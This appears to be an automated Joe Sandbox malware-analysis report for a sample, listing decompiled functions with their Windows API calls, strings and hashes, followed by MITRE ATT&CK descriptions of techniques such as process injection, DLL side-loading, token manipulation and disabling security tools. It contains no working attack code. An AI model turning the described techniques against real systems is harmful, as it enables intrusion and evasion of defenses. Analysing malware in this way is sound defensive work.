Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: d0b1e40db4fcddf94c963b340d73a14198cbda682f14f1ee3bb32c4005142f27
Instruction ID: cbd49cfb8102c9184a3f3bf9f0d7498915707516ddeda925cc8c7297d00a2844
Opcode Fuzzy Hash: d0b1e40db4fcddf94c963b340d73a14198cbda682f14f1ee3bb32c4005142f27
Instruction Fuzzy Hash: 5731F731A00707AFEB24CF4ACC55BEEBBB6EF85350F14011DE881A62A1DB709944CB51

Function 006866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00686761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0068676C

Strings

Combobox, xrefs: 0068672E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2564cb94c008c0d9251023f255dd3f9eff0974250980d8cd2ee0aa3f8d85e927
Instruction ID: 925a40596e028b47bf1d27eee8e9a1718d3b280286f8f734757b132b9301e1c2
Opcode Fuzzy Hash: 2564cb94c008c0d9251023f255dd3f9eff0974250980d8cd2ee0aa3f8d85e927
Instruction Fuzzy Hash: 42118275240208AFEF25AF54DC81EFB376BEB49368F114229F91497390D6719C9187A0

Function 00686C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91

GetWindowRect.USER32(00000000,?), ref: 00686C71
GetSysColor.USER32(00000012), ref: 00686C8B

Strings

static, xrefs: 00686C4E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 51a095f8ed82da08c2751ba0ada37a65c2e71a8510d5ce86d8d247a1e681926b
Instruction ID: c47c1f483c02bf186681e9e6a7500d60b59253bd0a4d4de4458ed7200b37959e
Opcode Fuzzy Hash: 51a095f8ed82da08c2751ba0ada37a65c2e71a8510d5ce86d8d247a1e681926b
Instruction Fuzzy Hash: 88212C72510209AFDF04EFA8CC45EFA7BA9FB08315F005629F955D2250D635E851DB60

Function 00686920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 006869A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006869B1

Strings

edit, xrefs: 00686986

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: ef8fb4d89741e2456556c01d21b79055d7bdf4ca18bf9ee4372a6818101cca0d
Instruction ID: 159fb8a1eae022653634bdb9f0fac69e32f916f974d8e203bfeaca449a496a02
Opcode Fuzzy Hash: ef8fb4d89741e2456556c01d21b79055d7bdf4ca18bf9ee4372a6818101cca0d
Instruction Fuzzy Hash: 5A118C7150020AABEF10AF64DC45EEB37ABEB05374F605728F9A5972E0C771DC9197A0

Function 006629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00662A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00662A41

Strings

0, xrefs: 00662A18

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 8fcd2d71e8a60eb8739d1e32e2a023d484b517c55eae63916d17d8088a18e146
Instruction ID: 3a97dd975212c6ea48c58dec4b06e485d3514c2dd4030bef64f32baffb619c67
Opcode Fuzzy Hash: 8fcd2d71e8a60eb8739d1e32e2a023d484b517c55eae63916d17d8088a18e146
Instruction Fuzzy Hash: D511D032901926ABCB30DFD8DC54BEA77AAAB45304F045125E895F7390D7B0AD0AC791

Function 006721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0067222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00672255

Strings

<local>, xrefs: 0067221D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 4f9524fb02cfba55f723b1a99112ab2d30d0e07a8e114555fe368599c33e0f4d
Instruction ID: 784d4d4f981ddd63b3bfe05dd1a8adee45ae9aff29935bb1fe9c0eb16d4f6c25
Opcode Fuzzy Hash: 4f9524fb02cfba55f723b1a99112ab2d30d0e07a8e114555fe368599c33e0f4d
Instruction Fuzzy Hash: 421106B0541226BADB248F118CA4EF7FBAEFF06351F10C22AF52846101D3709A91D6F0

Function 0061092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603C14,006C52F8,?,?,?), ref: 0061096E

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

_wcscat.LIBCMT ref: 00644CB7

Strings

Sl, xrefs: 006109AE

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: Sl
API String ID: 257928180-832812920
Opcode ID: 29b6810a917b4ffd32c77f48ce51977527b8ae7d3391a4eb03c964d5c3d00482
Instruction ID: 8b94b310148642123bad0ed35707fc44149a201c59e88e9533b75e2bbda81c60
Opcode Fuzzy Hash: 29b6810a917b4ffd32c77f48ce51977527b8ae7d3391a4eb03c964d5c3d00482
Instruction Fuzzy Hash: DB11E530900218ABDB80FF60CD12FDE77ABEF08340B0459A9B949D7281EAB0A7C44B14

Function 00658E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00658E73

Strings

ComboBox, xrefs: 00658E12
ListBox, xrefs: 00658E3D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9656e3fe88f932257bd369db6d5790c90a52273658fd66a1d217d9d1711a3950
Instruction ID: 3807d00ba1570cdd71bff750717542d98599d0eccbbe250d76652a9066cabadf
Opcode Fuzzy Hash: 9656e3fe88f932257bd369db6d5790c90a52273658fd66a1d217d9d1711a3950
Instruction Fuzzy Hash: D50192B1A41219AFCB18ABA4CC568FF736AAF46320F140A19BC26672E1EE31580CC650

Function 00658CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00658D6B

Strings

ComboBox, xrefs: 00658D0A
ListBox, xrefs: 00658D35

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c099a0eb553cffc6875514538ed6c723e4a0d874079a3395fd5e3fcaf2b8867d
Instruction ID: d99282239b7911ea26823d897ea6901fab92ac17f82239e7e23f69795ae39caa
Opcode Fuzzy Hash: c099a0eb553cffc6875514538ed6c723e4a0d874079a3395fd5e3fcaf2b8867d
Instruction Fuzzy Hash: 9801B1B1A81108AFCF18EBA0C952AFF73AA9F15341F100129B806772D1EE215E0C9665

Function 00658D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00658DEE

Strings

ComboBox, xrefs: 00658D8F
ListBox, xrefs: 00658DBA

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 20c908a4f0e53c60ebc2b62c56a7589063784c66917335a94e8c89c275d041a9
Instruction ID: e8e296cc7bf3f0a78cb9773d4ddfd272560e08ad390d4e2478ec042a1fe9ac15
Opcode Fuzzy Hash: 20c908a4f0e53c60ebc2b62c56a7589063784c66917335a94e8c89c275d041a9
Instruction Fuzzy Hash: CC01A7B1A81109BFDF15E7A4C942AFF77AA9F11301F100129BC06732D1DE255E0DD675

Function 0065C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0065C534

Part of subcall function 0065C816: _memmove.LIBCMT ref: 0065C860
Part of subcall function 0065C816: VariantInit.OLEAUT32(00000000), ref: 0065C882
Part of subcall function 0065C816: VariantCopy.OLEAUT32(00000000,?), ref: 0065C88C

VariantClear.OLEAUT32(?), ref: 0065C556

Strings

d}k, xrefs: 0065C517

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}k
API String ID: 2932060187-4033742213
Opcode ID: 1d27666c15c305edc18b46a659599f7c38e217c745f0a9f83b5fb3ced88b4249
Instruction ID: c39b85a369a8c0d6352fd2b9a1a4b3b64fecc4bc7a8206b5710d1eae5d56bfb7
Opcode Fuzzy Hash: 1d27666c15c305edc18b46a659599f7c38e217c745f0a9f83b5fb3ced88b4249
Instruction Fuzzy Hash: C81100B19007089FC710DF99D88489BFBF9FF08350B50862FE58AD7652E771AA48CB94

Function 00664F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00664F46
_wcscmp.LIBCMT ref: 00664F58

Strings

#32770, xrefs: 00664F52

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: da42ed1c346dc7ae83de519431693e2d9450e48fc94d956331338e94eff12b64
Instruction ID: c67d459f9cf00182eea162dd0392b1d29a2588b6223ea010d5a530f2a4c9d3af
Opcode Fuzzy Hash: da42ed1c346dc7ae83de519431693e2d9450e48fc94d956331338e94eff12b64
Instruction Fuzzy Hash: C0E092326002382AE7209B99AC49EA7F7ADEB95B60F11016AFD04D3151DA60AA558BE4

Function 0063B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0063B314: _memset.LIBCMT ref: 0063B321

Part of subcall function 00620940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0063B2F0,?,?,?,0060100A), ref: 00620945

IsDebuggerPresent.KERNEL32(?,?,?,0060100A), ref: 0063B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0060100A), ref: 0063B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0063B2FE

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 6ab7e537b5f0d8d5fb9c4a4365b9a658652877434418374b0cec90405a810db8
Instruction ID: 4c6a8c070d21baec4b87ef51ab6a255b336258739a45a255171bac72655a2f65
Opcode Fuzzy Hash: 6ab7e537b5f0d8d5fb9c4a4365b9a658652877434418374b0cec90405a810db8
Instruction Fuzzy Hash: 19E06DB02007218BE760AF68E8047427AE6BF00304F049A6CE456C7241EBB4E884CFA1

Function 00641935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00641775

Part of subcall function 0067BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0064195E,?), ref: 0067BFFE
Part of subcall function 0067BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0067C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0064196D

Strings

WIN_XPe, xrefs: 00641788

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 67b555515f46e3d0d5c1f0c5e0eac0e8bd9e237e5637810280672434a3c7f51b
Instruction ID: f0d4d574f3970f134f996fc9c4ebf540bda15e8ae86ae0b91923ed2ab9021b4c
Opcode Fuzzy Hash: 67b555515f46e3d0d5c1f0c5e0eac0e8bd9e237e5637810280672434a3c7f51b
Instruction Fuzzy Hash: 2CF0ED70800109EFDB15EB91C988BECBBFAFB09301F641096F112A6190D7755F85DF64

Function 00685964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0068596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00685981

Part of subcall function 00665244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006652BC

Strings

Shell_TrayWnd, xrefs: 00685967

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6086999325b0c40edba48f0d2b04ba06cde783409b19687ae6eb65241e563d5a
Instruction ID: 7864af3747cb635c45534e910745a5827c8b0a2cb51f30d313bbc4875622eb24
Opcode Fuzzy Hash: 6086999325b0c40edba48f0d2b04ba06cde783409b19687ae6eb65241e563d5a
Instruction Fuzzy Hash: 48D0C932384311BAE7A4BB709C1BFD66A1AAB10B50F011929B24AAB1D0D9E0A840C754

Function 00685998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006859AE
PostMessageW.USER32(00000000), ref: 006859B5

Part of subcall function 00665244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006652BC

Strings

Shell_TrayWnd, xrefs: 006859A7

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 3ceaa337c37f91499766cd79c8ded6913ae9515e8abb1c9cb1b3339aa2a3af3f
Instruction ID: bf315cb1743de8480922273a6b4fed0d115842cc359c00f0e9a7e40874232d80
Opcode Fuzzy Hash: 3ceaa337c37f91499766cd79c8ded6913ae9515e8abb1c9cb1b3339aa2a3af3f
Instruction Fuzzy Hash: 64D0C9323803117AE7A4BB709C0BFD6661AAB14B50F011929B246AB1D0D9E0A840C758

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
